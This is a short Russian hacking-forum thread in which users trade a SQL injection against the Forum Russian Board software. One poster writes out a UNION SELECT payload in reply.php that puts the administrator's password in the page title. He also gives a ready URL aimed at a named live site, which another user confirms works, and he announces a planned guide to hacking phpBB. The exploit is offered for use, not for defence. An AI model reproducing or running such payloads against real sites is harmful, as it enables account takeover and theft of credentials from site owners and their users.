Взлом Forum Russian Board

[c31337]

Бага старая но мож вам удастся найти еще пару форумов с уязвимостью:
Как всегда мая любимая sql injection:
http://target/forum/reply.php?m_id=1111 union select password
from frb_users where id=1/*&mid=6&t=1&cat=1 В заголовке
страницы получим пароль администратора.
Высказывайтесь

 

[Winux]

На каких двигах пашет и дай линки на примеры, где можно попробовать...

 

[Tycoon]

Скажите,где можно ещё найти уязвимости с примерами?

 

[c31337]

Ну я же написал что уязвимость канает в Forum Russian Board
Пример1:http://www.slimtek.ru/frb_light/reply.php?m_id=1111%20union%20select%20password%20%20from%20frb_users%20where%20id=1/*&mid=6&t=1&cat=1 в заголовке пароль

 

[Winux]

работает...
Классно. Уязвимость только в этих форумах?

 

[c31337]

Да там уязвимы и full и Light

 

[Winux]

Я про то, что в других двигах такого нет?
Может технология таже?

 

[c31337]

Технология sql ijecyion везде практически одинаковая, только нада ее найти и правильно запрос на базу сформировать посмотри про взлом IPB там запрос почти такойже

 

[Winux]

Я видел.
В том то и проблема что запрос сформировать надо.
Заведи еще тему про phphBB. Он вообще дырявейший.

И напиши как эти запросы формируются. Откуда брать их. Хорошо шпарить по готовому шаблону. А вот самому его сделать...

 

[c31337]

Как делать sql запросы книги пишут, а ты хочешь вот так просто...
Насчет PHPBB я хочу сделать огромный топик(с перечнем всех его дырявостей) И хочу снять видео по взлому phpbb(оно будет весить всего 1.2 мега)Но зато у народа вопросов будет меньше.
Winux -ты че по этому поводу думаешь?